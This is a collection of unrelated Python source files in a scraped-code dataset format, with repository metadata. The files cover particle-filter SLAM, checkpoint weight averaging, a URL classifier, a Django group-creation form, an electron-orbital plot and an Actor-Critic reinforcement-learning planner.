            # ...and the end cell more likely occupied, unless it was a ground hit.
            self.log_odds_[x_end, y_end] = self.log_odds_[x_end, y_end] + (1 - ground) * np.log(self.p_true_)
def _build_first_map(self, t0=0, use_lidar_yaw=True):
    """Build the initial map from the first lidar scan.

    Uses the currently highest-weight particle as the pose, ray-traces the
    scan via buildMAP, and records the best particle and its grid indices
    for time step t0.  `use_lidar_yaw` is kept for interface compatibility
    but is unused here.  (~45 lines of dead commented-out code removed.)
    """
    self.t0 = t0
    print('\n--------Doing build the first map--------')
    # Pose of the highest-weight particle.
    best_p_i = np.argmax(self.weights_)
    best_p = self.particles_[:, best_p_i]
    x = best_p[0]
    y = best_p[1]
    # Seed the Bresenham-cache start-cell bookkeeping used by buildMAP.
    self.psx = x
    self.psy = y
    theta = best_p[2]
    self.buildMAP(t0, x, y, theta)
    # Record the best particle and its grid indices for this time step.
    self.best_p_[:, t0] = best_p
    self.best_p_indices_[:, t0] = self.getMapCoord(x, y)
def _predict(self, t, use_lidar_yaw=True):
    """Prediction step: diffuse every particle with zero-mean Gaussian
    motion noise drawn from self.mov_cov_."""
    logging.debug('\n-------- Doing prediction at t = {0}------'.format(t))
    zero_mean = np.zeros(3)
    for idx in range(self.num_p_):
        # One independent noise sample per particle, composed onto its
        # pose with the SE(2) "smart plus" operator.
        noise = np.random.multivariate_normal(zero_mean, self.mov_cov_)
        self.particles_[:, idx] = tf.twoDSmartPlus(self.particles_[:, idx], noise)
def _update(self, t, t0=0, fig='on'):
    """Measurement update: score every particle's scan against the map,
    reweight the particles, then extend the map from the best particle.

    On the bootstrap call (t == t0) it delegates to _build_first_map and
    returns None; otherwise it returns self.MAP_.  `fig` is unused but
    kept for interface compatibility.
    """
    if t == t0:
        self._build_first_map(t0, use_lidar_yaw=True)
        return
    tj0 = self.getJointTime(t)
    neck_angle, head_angle = self.joints_.data_['head_angles'][:, tj0][0], self.joints_.data_['head_angles'][:, tj0][1]
    body_2_lidar_rot = tf.homo_transform(np.dot(tf.rot_z_axis(neck_angle), tf.rot_y_axis(head_angle)), [0, 0, 0])
    scan = self.lidar_.data_[t]['scan'][0]
    xscan = np.cos(self.lidar_angles) * scan
    yscan = np.sin(self.lidar_angles) * scan
    zscan = np.zeros((1, xscan.shape[1]))
    Onescan = np.ones(zscan.shape)
    # PERF: the homogeneous scan does not depend on the particle, so build it
    # once here instead of once per particle (the original rebuilt it inside
    # the loop below).
    homoscan = np.vstack((xscan, yscan, zscan, Onescan))
    corr = []
    for i in range(self.num_p_):
        pose_i = self.particles_[:, i]
        ground_2_body = tf.homo_transform(tf.rot_z_axis(pose_i[2]), [pose_i[0], pose_i[1], self.h_lidar_])
        ground_2_lidar = np.dot(ground_2_body, body_2_lidar_rot)
        trans_scan = np.dot(ground_2_lidar, homoscan)
        # Discard points outside the 40 m x 40 m map extent.
        trans_scan = trans_scan[:, abs(trans_scan[0]) < 20]
        trans_scan = trans_scan[:, abs(trans_scan[1]) < 20]
        x_ind, y_ind = self.getMapCoord(trans_scan[0], trans_scan[1])
        occupied_indices = np.vstack((x_ind, y_ind))
        corr.append(mapCorrelation(self.MAP_['map'], occupied_indices))
    corr = np.asarray(corr)
    self.weights_ = prob.update_weights(self.weights_, corr)
    # Rebuild/extend the map from the (new) best particle's pose.
    best_p_i = np.argmax(self.weights_)
    best_p = self.particles_[:, best_p_i]
    x = best_p[0]
    y = best_p[1]
    theta = best_p[2]
    self.buildMAP(t, x, y, theta)
    self.best_p_[:, t] = best_p
    self.best_p_indices_[:, t] = self.getMapCoord(x, y)
    return self.MAP_
| Saumya-Shah/SLAM-for-THOR | SLAM.py | SLAM.py | py | 16,423 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "sys.path.remove",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "sys.version_info",
"l... |
22051845535 | import argparse
import itertools
import os
import subprocess
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
from torch import linalg
from torch.nn import functional as F
def mix_many_models(out_path="/home/nick/shortcuts/monodepth3_checkpoints/soup/res.pt"):
    """Average the weights ("model soup") of every checkpoint found in
    args.model_path and save the result.

    out_path: destination checkpoint file; defaults to the original
        hard-coded location for backward compatibility.
    Reads the module-level `args` set by the __main__ block.
    """
    model_paths = [
        os.path.join(args.model_path, file_name)
        for file_name in os.listdir(args.model_path)
    ]
    # The original enumerated every alpha combination on a 0..1 grid
    # (itertools.product with repeat=len(model_paths) — exponential in the
    # number of models), filtered it, and then immediately overwrote the
    # result with the uniform mix below.  The dead enumeration is removed;
    # only the uniform soup was ever computed.
    alpha_combinations = [[1 / len(model_paths)] * len(model_paths)]
    for i, alpha_combination in enumerate(alpha_combinations):
        print(f"Combination {i + 1} of {len(alpha_combinations)}")
        print(f"Alphas: {alpha_combination}")
        # Weighted average of the checkpoints' state dicts, accumulated
        # key by key.
        theta = {}
        for j, model_path in enumerate(model_paths):
            alpha = alpha_combination[j]
            theta_j = torch.load(model_path)["model"]
            for key in theta_j.keys():
                if key not in theta:
                    theta[key] = alpha * theta_j[key]
                else:
                    theta[key] += alpha * theta_j[key]
        torch.save(
            {
                "model": theta,
            },
            out_path,
        )
if __name__ == "__main__":
    # Single positional argument: directory containing the checkpoints to mix.
    parser = argparse.ArgumentParser()
    parser.add_argument("model_path", help="path to model")
    # Module-level global: mix_many_models() reads args.model_path.
    args = parser.parse_args()
    mix_many_models()
| Lavreniuk/2nd-place-solution-in-Scene-Understanding-for-Autonomous-Drone-Delivery | Mono_depth/soup.py | soup.py | py | 1,869 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number"... |
36903356880 | import pickle
import DLfunctions as dl
from keras.preprocessing.sequence import pad_sequences
print("What is the name of the hyperparams file?(Local directory):")
params_file_name = input()
a_file = open(params_file_name, "rb")
params = pickle.load(a_file)
w = params["w"]
b = params["b"]
print("What is the questionable URL?")
X_URL = input()
X_URL_list = []
#convert to array
X_URL_list.append([ord(c) for c in X_URL][:-2])
print(X_URL_list)
padded = pad_sequences(X_URL_list,maxlen=3063,padding='post')
print(padded)
X_TEST = padded.T
if(dl.predict(w, b, X_TEST)):
print("This is probably a bad URL!")
else:
print("This is probably an okay URL!")
| sidejackthenativity/DL_URLquery | bad_or_good_url.py | bad_or_good_url.py | py | 664 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pickle.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "keras.preprocessing.sequence.pad_sequences",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "DLfunctions.predict",
"line_number": 25,
"usage_type": "call"
}
] |
9439454968 | from django import forms
from .models import Museum, Group
from user.models import UserProfile
class CreateGroupForm(forms.Form):
    """Form for creating a museum Group together with its placeholder users."""

    name = forms.CharField(max_length=50)
    number = forms.IntegerField(min_value=1, max_value=200)
    museum = forms.ModelChoiceField(Museum.objects.all())

    def create_users_pdf(self, user):
        """Create the group and `number` placeholder profiles attached to it.

        user: the creator, stored on the group.
        Returns the list of qr_tokens of the created profiles.  The original
        collected the tokens and then silently discarded them; returning the
        list lets callers actually build the QR-code PDF the method name
        promises, and is backward-compatible (previous return was None).
        """
        museum = self.cleaned_data['museum']
        name = self.cleaned_data['name']
        group = Group(
            museum=museum,
            name=name,
            created_by=user
        )
        # Save first so the group has a primary key before M2M adds.
        group.save()
        tokens = []
        for x in range(self.cleaned_data['number']):
            profile = UserProfile()
            profile.display_name = f'space cadet {x + 1}'
            profile.save()
            group.profiles.add(profile)
            museum.profiles.add(profile)
            tokens.append(profile.qr_token)
        group.save()
        museum.save()
        return tokens
{
"api_name": "django.forms.Form",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.forms.CharField",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.forms"... |
13460846161 | # coding: UTF-8
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Declare variables; zn is the atomic number (18 = argon)
i = 0
zn = 18.0
# Create the figure; the azim/elev options can set the viewing angle.
# NOTE(review): newer matplotlib versions reject aspect='equal' on 3D axes —
# confirm against the pinned matplotlib version.
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', aspect='equal')
# Axis labels and plot limits
ax.set_xlabel("X-axis")
ax.set_ylabel("Y-axis")
ax.set_zlabel("Z-axis")
ax.set_xlim([-0.5, 0.5])
ax.set_ylim([-0.5, 0.5])
ax.set_zlim([-0.5, 0.5])
# Electron-cloud rendering by Monte Carlo rejection sampling.
# r is the radius relative to the Bohr radius; pls is the 2pz-orbital
# wave function value, so p < pls**2 accepts points with probability
# proportional to the electron density.
while i < 300000:
    p = np.random.rand()
    x = np.random.rand() * 1.0 - 0.5
    y = np.random.rand() * 1.0 - 0.5
    z = np.random.rand() * 1.0 - 0.5
    r = np.sqrt(x ** 2 + y ** 2 + z ** 2)
    rho = zn * r
    pls = 0.5 / np.sqrt(6.0) * zn * np.sqrt(zn) * rho * np.exp( - rho * 0.5) * 0.5 * np.sqrt(3.0 / np.pi) * z / r
    # Color the two lobes by the sign of z (wave-function phase):
    # red for z > 0, blue for z < 0; i counts only accepted points.
    if p < pls ** 2 and z > 0:
        ax.scatter3D(x, y, z, s=0.1, color='#FF0000', alpha=0.01)
        i += 1
    elif p < pls ** 2 and z < 0:
        ax.scatter3D(x, y, z, s=0.1, color='#0000FF', alpha=0.01)
        i += 1
# Save the rendered figure
plt.savefig("Argraph2pz.png")
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "numpy.random.rand",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.ra... |
32631833253 | # -*- coding: utf-8 -*-
import numpy as np
from collections import deque, OrderedDict
from datetime import datetime
from common.funcs import *
from common.layers import *
from common.optimizers import *
class Planner_separate():
    """Actor-Critic planner with separate (non-shared) Actor and Critic
    networks for a continuous action space.  The Actor outputs the mean and
    log-variance of a Gaussian policy; the Critic outputs a state value V.
    (All original Japanese comments translated to English; code unchanged.)"""

    def __init__(self, name, env, state_dim, action_dim):
        # name: name of this Planner instance
        # env: the environment this Planner instance targets
        # state_dim: number of state elements this Planner instance recognizes
        # action_dim: number of action elements this Planner instance recognizes
        self._name = name
        self._env = env
        self._state_dim = state_dim
        self._action_dim = action_dim

        ### Layer definitions ###
        output_dim_afn1 = self._state_dim*10
        output_dim_afn3 = self._action_dim*10
        # NOTE(review): np.int was removed in NumPy 1.24 — on newer NumPy this
        # line needs plain int; confirm the pinned NumPy version.
        output_dim_afn2 = np.ceil( np.sqrt(output_dim_afn1*output_dim_afn3) ).astype(np.int)

        ## Actor layer definitions ##
        self._layers_actor = OrderedDict()
        # (1) Affine "afn1_actor": instance of Affine
        opt_afn1_actor = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn1_actor = Affine(name="afn1_actor", input_shape=(state_dim,), output_shape=(output_dim_afn1,), optimizer=opt_afn1_actor,
                            init_weight_option="xavier")
        self._layers_actor[afn1_actor.name] = afn1_actor
        prev_layer = afn1_actor
        # (2) Tanh "tanh_afn1_actor": instance of Tanh
        tanh_afn1_actor = Tanh(name="tanh_afn1_actor", input_shape=prev_layer.output_shape)
        self._layers_actor[tanh_afn1_actor.name] = tanh_afn1_actor
        prev_layer = tanh_afn1_actor
        # (3) Affine "afn2_actor": instance of Affine
        opt_afn2_actor = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn2_actor = Affine(name="afn2_actor", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn2,), optimizer=opt_afn2_actor,
                            init_weight_option="xavier")
        self._layers_actor[afn2_actor.name] = afn2_actor
        prev_layer = afn2_actor
        # (4) Tanh "tanh_afn2_actor": instance of Tanh
        tanh_afn2_actor = Tanh(name="tanh_afn2_actor", input_shape=prev_layer.output_shape)
        self._layers_actor[tanh_afn2_actor.name] = tanh_afn2_actor
        prev_layer = tanh_afn2_actor
        # (5) Affine "afn3_actor": instance of Affine
        opt_afn3_actor = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn3_actor = Affine(name="afn3_actor", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn3,), optimizer=opt_afn3_actor,
                            init_weight_option="xavier")
        self._layers_actor[afn3_actor.name] = afn3_actor
        prev_layer = afn3_actor
        # (6) Tanh "tanh_afn3_actor": instance of Tanh
        tanh_afn3_actor = Tanh(name="tanh_afn3_actor", input_shape=prev_layer.output_shape)
        self._layers_actor[tanh_afn3_actor.name] = tanh_afn3_actor
        prev_layer = tanh_afn3_actor
        # Actor output layers for the mean mu: internally one Affine and one Tanh
        opt_afn_actor_mu = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        self._out_actor_mu = Actor_Output(name="out_actor_mu", input_shape=prev_layer.output_shape,
                                          output_shape=(action_dim,), optimizer=opt_afn_actor_mu)
        # Note: intentionally NOT included in self._layers_actor
        # Actor output layers for log(var) of the variance: one Affine and one Tanh
        opt_afn_actor_log_var = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        self._out_actor_log_var = Actor_Output(name="out_actor_log_var", input_shape=prev_layer.output_shape,
                                               output_shape=(action_dim,), optimizer=opt_afn_actor_log_var)
        # Note: intentionally NOT included in self._layers_actor
        ## End of Actor layer definitions ##

        ## Critic layer definitions ##
        self._layers_critic = OrderedDict()
        # (1) Affine "afn1_critic": instance of Affine
        opt_afn1_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn1_critic = Affine(name="afn1_critic", input_shape=(state_dim,), output_shape=(output_dim_afn1,), optimizer=opt_afn1_critic,
                             init_weight_option="xavier")
        self._layers_critic[afn1_critic.name] = afn1_critic
        prev_layer = afn1_critic
        # (2) Tanh "tanh_afn1_critic": instance of Tanh
        tanh_afn1_critic = Tanh(name="tanh_afn1_critic", input_shape=prev_layer.output_shape)
        self._layers_critic[tanh_afn1_critic.name] = tanh_afn1_critic
        prev_layer = tanh_afn1_critic
        # (3) Affine "afn2_critic": instance of Affine
        opt_afn2_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn2_critic = Affine(name="afn2_critic", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn2,), optimizer=opt_afn2_critic,
                             init_weight_option="xavier")
        self._layers_critic[afn2_critic.name] = afn2_critic
        prev_layer = afn2_critic
        # (4) Tanh "tanh_afn2_critic": instance of Tanh
        tanh_afn2_critic = Tanh(name="tanh_afn2_critic", input_shape=prev_layer.output_shape)
        self._layers_critic[tanh_afn2_critic.name] = tanh_afn2_critic
        prev_layer = tanh_afn2_critic
        # (5) Affine "afn3_critic": instance of Affine
        opt_afn3_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn3_critic = Affine(name="afn3_critic", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn3,), optimizer=opt_afn3_critic,
                             init_weight_option="xavier")
        self._layers_critic[afn3_critic.name] = afn3_critic
        prev_layer = afn3_critic
        # (6) Tanh "tanh_afn3_critic": instance of Tanh
        tanh_afn3_critic = Tanh(name="tanh_afn3_critic", input_shape=prev_layer.output_shape)
        self._layers_critic[tanh_afn3_critic.name] = tanh_afn3_critic
        prev_layer = tanh_afn3_critic
        # (7) Affine "afn4_critic": output layer, no activation (linear)
        opt_afn4_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
        afn4_critic = Affine(name="afn4_critic", input_shape=prev_layer.output_shape, output_shape=(1,), optimizer=opt_afn4_critic,
                             init_weight_option="xavier")
        self._layers_critic[afn4_critic.name] = afn4_critic
        ## End of Critic layer definitions ##

        ## Actor and Critic loss definitions ##
        # Actor loss
        self._loss_actor = Actor_Loss("loss_actor")
        # Critic loss
        self._loss_critic = Critic_Loss("loss_critic")
        ## End of Actor and Critic loss definitions ##

    def predict_best_action(self, a_state):
        # Infer the best action for a single state.
        if a_state.ndim==1:
            a_state = a_state.reshape(1, self._state_dim)
        elif a_state.shape[0]!=1:
            # NOTE(review): "ValueException" is undefined in Python — this raise
            # would itself fail with NameError; ValueError was probably intended.
            # (Message: "Provide exactly one a_state; best action is inferred
            # for a single state.")
            raise ValueException("a_stateは1件だけにしてください。1件のstateについてbest actionを推測します。")
        # Get the Gaussian mean mu and log-variance log_var from the Actor.
        # Both are (1, action_dim).
        mu, log_var = self._forward_output_actor(a_state, train_flg=False)
        # Variance var
        # (1, action_dim)
        var = np.exp(log_var)
        # Drop the batch axis (axis=0) from mu and var, leaving (action_dim,)
        mu = mu[0]
        var = var[0]
        # Sample from the Gaussian with mean mu and variance var
        best_action = np.random.normal(loc=mu, scale=np.sqrt(var))
        return best_action

    def _forward_output_actor(self, state, train_flg):
        # Actor output (forward pass).
        # Apart from the branch split, do no operations here that affect gradients.
        if state.ndim==1:
            state = state.reshape(1, self._state_dim)
        ## Output of the Actor intermediate layers ##
        # Call the output "m"
        # (N, M) where "M" is the neuron count of the last intermediate Affine
        x = state
        for layer in self._layers_actor.values():
            x = layer.forward(x, train_flg)
        m = x
        ## End of Actor intermediate-layer output ##
        ## Actor outputs ##
        # Feed the intermediate output into the two output layer stacks;
        # the intermediate output branches in two here.
        # Output of the Actor mu output layers: (N, action_dim)
        mu = self._out_actor_mu.forward(m, train_flg)
        # Output of the Actor log(var) output layers: (N, action_dim)
        log_var = self._out_actor_log_var.forward(m, train_flg)
        ## End of Actor outputs ##
        return mu, log_var

    def _backward_output_actor(self, d_mu, d_log_var):
        # Backpropagation from the Actor outputs all the way to the input.
        ## Backprop through the Actor outputs ##
        # Backprop through the Actor mu output part
        # (N, M) where "M" is the neuron count of the last intermediate Affine
        d_m_mu = self._out_actor_mu.backward(d_mu)
        # Backprop through the Actor log(var) output part
        # (N, M) where "M" is the neuron count of the last intermediate Affine
        d_m_log_var = self._out_actor_log_var.backward(d_log_var)
        # The forward pass branched the intermediate output m into the mu and
        # log(var) heads, so the gradients flowing back from both are summed.
        d_m = d_m_mu + d_m_log_var
        ## End of backprop through the Actor outputs ##
        ## Backprop through the Actor intermediate layers (to the input) ##
        # (N, state_dim)
        layers_shared = list(self._layers_actor.values())
        layers_shared.reverse()
        d_out = d_m
        for layer in layers_shared:
            d_out = layer.backward(d_out)
        d_state = d_out
        ## End of backprop through the Actor intermediate layers ##
        return d_state

    def _forward_output_critic(self, state, train_flg):
        # Critic output (forward pass).
        # Apart from the branch split, do no operations here that affect gradients.
        if state.ndim==1:
            state = state.reshape(1, self._state_dim)
        x = state
        for layer in self._layers_critic.values():
            x = layer.forward(x, train_flg)
        V = x
        return V

    def _backward_output_critic(self, d_V):
        # Backpropagation from the Critic output all the way to the input.
        layers_shared = list(self._layers_critic.values())
        layers_shared.reverse()
        d_out = d_V
        for layer in layers_shared:
            d_out = layer.backward(d_out)
        d_state = d_out
        return d_state

    def _forward_loss_actor(self, state, action, G, V, softplus_to_advantage, weight_decay_lmd):
        # Actor loss.
        # The states that produced action and G must be in the same order as
        # the state argument.
        # Apart from the branch split, do no operations here that affect gradients.
        # V: Critic output (N, 1)
        ## Actor outputs ##
        # Actor mu output and Actor log(var) output
        # (N, action_dim), (N, action_dim)
        mu, log_var = self._forward_output_actor(state, train_flg=True)
        ## End of Actor outputs ##
        ## Actor loss ##
        La = self._loss_actor.forward(mu, log_var, action, V, G, softplus_to_advantage)
        ## End of Actor loss ##
        # Weight decay
        if weight_decay_lmd > 0:
            sum_all_weights_square = self._sum_all_weights_square(role=0)
            La = La + 0.5*weight_decay_lmd*sum_all_weights_square
        return La

    def _backward_loss_actor(self, d_La=1):
        # End-to-end backprop from the Actor loss to the input.
        ## Actor loss backprop ##
        # Both (N, action_dim)
        d_mu, d_log_var = self._loss_actor.backward(d_La)
        ## End of Actor loss backprop ##
        ## Backprop through the Actor outputs and intermediate layers ##
        # (N, state_dim)
        d_states = self._backward_output_actor(d_mu, d_log_var)
        ## End of backprop through the Actor outputs and intermediate layers ##
        return d_states

    def _forward_loss_critic(self, state, G, weight_decay_lmd):
        # Critic loss.
        # The states that produced G must be in the same order as the state argument.
        # Apart from the branch split, do no operations here that affect gradients.
        ## Critic output ##
        # Critic output V
        # (N, 1)
        V = self._forward_output_critic(state, train_flg=True)
        ## End of Critic output ##
        ## Critic loss ##
        Lc = self._loss_critic.forward(V, G)  # G is used as the teaching signal
        ## End of Critic loss ##
        # Weight decay
        if weight_decay_lmd > 0:
            sum_all_weights_square = self._sum_all_weights_square(role=1)
            Lc = Lc + 0.5*weight_decay_lmd*sum_all_weights_square
        # V is also returned because the caller uses it
        return Lc, V

    def _backward_loss_critic(self, d_Lc=1):
        # End-to-end backprop from the Critic loss to the input.
        ## Critic loss backprop ##
        # (N, 1)
        d_V = self._loss_critic.backward(d_Lc)
        ## End of Critic loss backprop ##
        ## Backprop through the Critic output and layers ##
        # (N, state_dim)
        d_states = self._backward_output_critic(d_V)
        ## End of backprop through the Critic output and layers ##
        return d_states

    def train(self, episodes, steps_per_episode, gamma=0.99, metrics=1, standardize_G=True, softplus_to_advantage=False,
              weight_decay_lmd=0, verbose_interval=100):
        """Run REINFORCE-style Actor-Critic training.

        episodes: number of episodes; steps_per_episode: max steps each.
        gamma: discount factor.  metrics: 0 = judge episodes by step count,
        1 = by score.  standardize_G: standardize the discounted returns.
        Returns a result dict with per-episode records and the arguments.
        """
        start_time = datetime.now()
        # Create per-episode record lists
        loss_episodes = []  # per-episode loss list (unused; kept as in original)
        loss_actor_episodes = []  # per-episode Actor loss list
        loss_critic_episodes = []  # per-episode Critic loss list
        step_count_episodes = []  # per-episode step-count list
        score_episodes = []  # per-episode score (sum of step rewards) list
        episode_count = 0
        step_count_total = 0
        best_step_count = 0  # largest step count over all episodes so far
        best_score = -np.inf  # largest score over all episodes so far
        best_metrics_count = 0
        # Episode loop
        for ep in range(0, episodes):
            # One episode
            # Lists recording every step of this episode
            state_steps_episode = []
            action_steps_episode = []
            reward_steps_episode = []
            next_state_steps_episode = []
            step_count_ep = 0
            score_ep = 0
            save_temp_params = False
            # Reset the agent to the environment's start state
            curr_st = self._env.reset()
            # Step loop
            for st in range(steps_per_episode):
                # One step: sample an action and apply it to the environment
                action_predicted = self.predict_best_action(curr_st)
                next_st, reward_earned, done, info = self._env.step(action_predicted)
                # Append this step to the episode's records
                state_steps_episode.append(curr_st)
                action_steps_episode.append(action_predicted)
                reward_steps_episode.append(reward_earned)
                next_state_steps_episode.append(next_st)
                step_count_ep += 1
                step_count_total += 1
                # Stop stepping once steps_per_episode is reached or the env
                # returned done=True; otherwise advance the state.
                if step_count_ep>=steps_per_episode or done==True:
                    break
                else:
                    curr_st = next_st
            # End of step loop
            # Episode score: plain sum of the per-step immediate rewards
            score_ep = sum(reward_steps_episode)
            # If this episode's performance is the best so far, stash the parameters
            if metrics==0 and (step_count_ep>=best_step_count):
                # Performance measured by step count
                best_step_count = step_count_ep
                best_metrics_count += 1
                save_temp_params = True
            elif metrics==1 and (score_ep>=best_score):
                # Performance measured by score
                best_score = score_ep
                best_metrics_count += 1
                save_temp_params = True
            if save_temp_params==True:
                # Temporarily stash the parameters
                self._keep_temporarily_all_learnable_params()
            # Compute the discounted return "G" for each step
            li_G = self._calc_G_of_step_in_an_episode(reward_steps_episode, gamma)
            # Standardize G; controlled by the standardize_G argument
            if standardize_G==True:
                Gs = standardize(li_G, with_mean=False).reshape(-1, 1)  # standardization without zero-centering
            else:
                Gs = np.array(li_G).reshape(-1, 1)
            # Prepare the arguments for the Actor/Critic loss forward passes
            states = np.array(state_steps_episode)
            actions = np.array(action_steps_episode)
            # Critic loss forward pass; also obtain V, used by the Actor
            loss_critic_ep, Vs = self._forward_loss_critic(state=states, G=Gs, weight_decay_lmd=weight_decay_lmd)
            # Critic backprop
            _ = self._backward_loss_critic(d_Lc=1)
            # Critic parameter update
            self._update_all_learnable_params(role=1, weight_decay_lmd=weight_decay_lmd)
            # Actor loss forward pass
            loss_actor_ep = self._forward_loss_actor(state=states, action=actions, G=Gs, V=Vs,
                                                     softplus_to_advantage=softplus_to_advantage,
                                                     weight_decay_lmd=weight_decay_lmd)
            # Actor backprop
            _ = self._backward_loss_actor(d_La=1)
            # Actor parameter update
            self._update_all_learnable_params(role=0, weight_decay_lmd=weight_decay_lmd)
            # Append this episode's records to the per-episode lists
            step_count_episodes.append(step_count_ep)  # step count
            loss_actor_episodes.append(loss_actor_ep)  # Actor loss
            loss_critic_episodes.append(loss_critic_ep)  # Critic loss
            score_episodes.append(score_ep)  # score
            if verbose_interval>0 and ( (ep+1)%verbose_interval==0 or ep==0 or (ep+1)==episodes ):
                time_string = datetime.now().strftime('%H:%M:%S')
                if metrics==0:
                    best_metrics_string = " best step count:" + str(best_step_count) + "(" + str(best_metrics_count) + "回)"
                elif metrics==1:
                    best_metrics_string = " best score:" + str(best_score) + "(" + str(best_metrics_count) + "回)"
                else:
                    best_metrics_string=""
                if save_temp_params==True:
                    params_saved_string = " ベストなパラメーターを一時退避"
                else:
                    params_saved_string = ""
                print("Episode:" + str(ep) + " score:" + str(score_ep) + " step count:" + str(step_count_ep) + \
                      " loss_actor:" + str(loss_actor_ep) + " loss_critic:" + str(loss_critic_ep) + \
                      best_metrics_string + params_saved_string + " time:" + time_string)
            episode_count += 1
        # End of episode loop
        # Restore the temporarily stashed (best) parameters
        self._adopt_all_learnable_params_kept_temporarily()
        if verbose_interval>0:
            print("一時退避したベストなパラメーターを正式採用")
        end_time = datetime.now()
        processing_time_total = end_time - start_time  # total processing time, datetime.timedelta
        processing_time_total_string = timedelta_HMS_string(processing_time_total)  # string form of the total time
        # Build the result dict with the per-episode records and the arguments
        result = {}
        result["name"] = self._name
        result["episode_count"] = episode_count
        result["loss_actor_episodes"] = loss_actor_episodes
        result["loss_critic_episodes"] = loss_critic_episodes
        result["step_count_episodes"] = step_count_episodes
        result["score_episodes"] = score_episodes
        result["step_count_total"] = step_count_total
        result["processing_time_total_string"] = processing_time_total_string
        result["processing_time_total"] = processing_time_total
        # Arguments below
        result["episodes"] = episodes
        result["steps_per_episode"] = steps_per_episode
        result["gamma"] = gamma
        result["metrics"] = metrics
        result["softplus_to_advantage"] = softplus_to_advantage
        result["weight_decay_lmd"] = weight_decay_lmd
        return result

    def _calc_G_of_step_in_an_episode(self, li_reward_in_an_episode, gamma):
        # Compute the discounted return G for every step of one episode.
        # li_reward_in_an_episode: list of rewards for all steps of one episode.
        # Returns the list of sum_of_discounted_rewards for each step of this
        # episode; its length equals the step count.
        # Note: with Experience Replay this would instead attach G to the
        # episode's step records and push them into an experience buffer.
        li_G = []
        for t, r in enumerate(li_reward_in_an_episode):
            li_discounted_rewards_future = \
                [r_following * (gamma**t_diff) for t_diff, r_following in enumerate(li_reward_in_an_episode[t:])]
            sum_of_discounted_rewards = sum(li_discounted_rewards_future)
            li_G.append(sum_of_discounted_rewards)
        return li_G

    def _update_all_learnable_params(self, role, weight_decay_lmd):
        # role: Actor (0) or Critic (1)
        # Update all trainable parameters of every layer for the given role at once.
        if role==0:
            # Actor
            for layer in self._layers_actor.values():
                if layer.trainable == True:
                    layer.update_learnable_params(weight_decay_lmd)
            self._out_actor_mu.update_learnable_params(weight_decay_lmd)
            self._out_actor_log_var.update_learnable_params(weight_decay_lmd)
        elif role==1:
            # Critic
            for layer in self._layers_critic.values():
                if layer.trainable == True:
                    layer.update_learnable_params(weight_decay_lmd)

    def save_params_in_file(self, file_dir, file_name=""):
        # Save this model instance's parameters to a file.
        if file_name=="":
            file_name = self._name + ".pickle"
        file_path = file_dir + file_name
        # Saved as a dictionary keyed by layer.name.
        # all_params_dic (Dictionary)
        #   -- learnable layer1's parameter tuple (weights ndarray, biases ndarray)
        #   -- learnable layer2's parameter tuple (weights ndarray, biases ndarray)
        #      ...
        #   -- Actor output layers' parameter tuple (weights ndarray, biases ndarray)
        all_params_dic = {}
        # Actor parameters
        for layer in self._layers_actor.values():
            if layer.trainable == True:
                params_tpl = layer.copy_params()
                all_params_dic[layer.name] = params_tpl
        all_params_dic[self._out_actor_mu.name] = self._out_actor_mu.copy_params()
        all_params_dic[self._out_actor_log_var.name] = self._out_actor_log_var.copy_params()
        # Critic parameters
        for layer in self._layers_critic.values():
            if layer.trainable == True:
                params_tpl = layer.copy_params()
                all_params_dic[layer.name] = params_tpl
        save_pickle_file(all_params_dic, file_path)
        return file_name

    def overwrite_params_from_file(self, file_path):
        # Replace all of this model instance's parameters with ones saved in a file.
        param_layer_tpls_dic = read_pickle_file(file_path)
        for layer_name in param_layer_tpls_dic.keys():
            # Take the parameters to overwrite, one layer at a time
            layer_params_tpl = param_layer_tpls_dic[layer_name]
            # Overwrite the destination layer; the destination is the layer
            # with the same name.
            if layer_name in self._layers_actor.keys():
                # Actor intermediate layers
                to_layer = self._layers_actor[layer_name]
                if to_layer.trainable==True:
                    # Trainable layer: overwrite
                    to_layer.overwrite_params(layer_params_tpl)
            elif layer_name==self._out_actor_mu.name:
                # Actor mu output layers
                self._out_actor_mu.overwrite_params(layer_params_tpl)
            elif layer_name==self._out_actor_log_var.name:
                # Actor log(var) output layers
                self._out_actor_log_var.overwrite_params(layer_params_tpl)
            elif layer_name in self._layers_critic.keys():
                # All Critic layers
                to_layer = self._layers_critic[layer_name]
                if to_layer.trainable==True:
                    # Trainable layer: overwrite
                    to_layer.overwrite_params(layer_params_tpl)

    def _keep_temporarily_all_learnable_params(self):
